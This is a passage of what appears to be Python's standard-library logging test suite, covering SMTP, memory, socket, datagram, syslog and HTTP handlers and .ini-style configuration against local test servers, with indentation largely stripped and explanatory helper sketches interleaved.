super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
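# Wiring sketch (illustrative only; the addresses are placeholders and the
# real assertions live in SMTPHandlerTest.test_basic above): an SMTPHandler
# takes its mail host as a (host, port) tuple, so it can be pointed straight
# at an in-process TestSMTPServer.
def _example_smtp_handler_wiring(host, port):
    import logging
    import logging.handlers

    handler = logging.handlers.SMTPHandler(
        (host, port),                        # mailhost as a (host, port) tuple
        fromaddr='me@example.com',           # placeholder addresses
        toaddrs=['you@example.com'],
        subject='Log',
        timeout=5.0,
    )
    logger = logging.getLogger('example.smtp')
    logger.addHandler(handler)
    return logger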
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
@threading_helper.requires_working_threading()
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
threading_helper.join_thread(thread)
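# Standalone sketch of the MemoryHandler flush rules exercised above
# (standard-library semantics, illustrative only): records are buffered until
# either the buffer holds `capacity` records or a record at or above
# `flushLevel` arrives, at which point everything buffered is forwarded to
# the target handler.
def _example_memory_handler_flush_rules():
    import io
    import logging
    import logging.handlers

    stream = io.StringIO()
    target = logging.StreamHandler(stream)
    mem = logging.handlers.MemoryHandler(capacity=3,
                                         flushLevel=logging.ERROR,
                                         target=target)
    logger = logging.getLogger('example.memory')
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    logger.addHandler(mem)
    try:
        logger.debug('buffered')            # nothing reaches the target yet
        logger.error('flushes the buffer')  # >= flushLevel: both lines appear
    finally:
        logger.removeHandler(mem)
        mem.close()
    return stream.getvalue()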
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
def closeFileHandler(h, fn):
h.close()
os.remove(fn)
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config8 checks for a resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
kwargs={{"encoding": "utf-8"}}
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, encoding="utf-8", **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
with self.check_no_resource_warning():
fn = make_temp_file(".log", "test_logging-X-")
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(closeFileHandler, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
encoding="utf-8",
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
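# Illustrative helper (an assumption, not used by the tests; apply_config in
# ConfigFileTest above is the real entry point): fileConfig() also accepts a
# file-like object, so any of the config strings defined above can be applied
# without touching the filesystem.  Note that the args=/kwargs= values in the
# handler sections are evaluated as Python expressions, which is why values
# such as sys.stdout work there.
def _example_fileconfig_from_string(config_text):
    import io
    import textwrap
    import logging.config

    logging.config.fileConfig(io.StringIO(textwrap.dedent(config_text)),
                              disable_existing_loggers=False)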
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
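# Sketch of the wire format handle_socket() above consumes (standard
# SocketHandler behaviour, shown here for illustration): each record is sent
# as a 4-byte big-endian length prefix followed by a pickled dict of the
# LogRecord attributes, which makeLogRecord() turns back into a LogRecord.
def _example_decode_socket_handler_frame(payload):
    import logging
    import pickle
    import struct

    (slen,) = struct.unpack('>L', payload[:4])
    attrs = pickle.loads(payload[4:4 + slen])
    return logging.makeLogRecord(attrs)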
def _get_temp_domain_socket():
fn = make_temp_file(prefix='test_logging_', suffix='.sock')
# We just need a name - the file must not already exist, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
def test_udp_reconnection(self):
logger = logging.getLogger("slh")
self.sl_hdlr.close()
self.handled.clear()
logger.error("sp\xe4m")
self.handled.wait(0.1)
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
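# Sketch of where the b'<11>' prefix asserted above comes from (standard
# SysLogHandler behaviour): the priority is facility * 8 + severity; ERROR
# maps to syslog severity LOG_ERR (3) and the default facility is LOG_USER
# (1), giving 1 * 8 + 3 == 11.  The trailing NUL byte is controlled by the
# append_nul attribute, as the test toggles above.
def _example_syslog_priority():
    import logging.handlers

    facility = logging.handlers.SysLogHandler.LOG_USER   # 1
    severity = logging.handlers.SysLogHandler.LOG_ERR    # 3
    return '<%d>' % (facility * 8 + severity)            # '<11>'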
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except Exception:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
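# Sketch of why parse_qs() recovers the record attributes above (standard
# HTTPHandler behaviour, shown here for illustration): the handler urlencodes
# the LogRecord's attribute dict and sends it as the GET query string or the
# POST body, so every attribute comes back as a list of strings.
def _example_http_handler_payload():
    import logging
    from urllib.parse import parse_qs, urlencode

    record = logging.makeLogRecord({'msg': 'sp\xe4m', 'name': 'http'})
    payload = urlencode(record.__dict__)   # what HTTPHandler puts on the wire
    return parse_qs(payload)['msg']        # ['sp\xe4m']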
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
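# Sketch of the persistence property asserted above (standard logging
# behaviour): getLogger() with the same name always returns the same Logger
# object, so configuration survives even when all local references go away.
def _example_logger_persistence():
    import logging

    first = logging.getLogger('example.persistent')
    first.setLevel(logging.DEBUG)
    again = logging.getLogger('example.persistent')
    return again is first and again.level == logging.DEBUG   # True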
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = make_temp_file(".log", "test_logging-1-")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
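# Sketch of the captureWarnings() routing exercised above (standard logging
# behaviour, illustrative only): once enabled, warnings.warn() output is
# delivered as a WARNING record on the 'py.warnings' logger instead of being
# written to stderr.
def _example_capture_warnings():
    import io
    import logging
    import warnings

    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    logging.getLogger('py.warnings').addHandler(handler)
    logging.captureWarnings(True)
    try:
        warnings.warn('routed through logging')
    finally:
        logging.captureWarnings(False)
        logging.getLogger('py.warnings').removeHandler(handler)
    return stream.getvalue()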
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
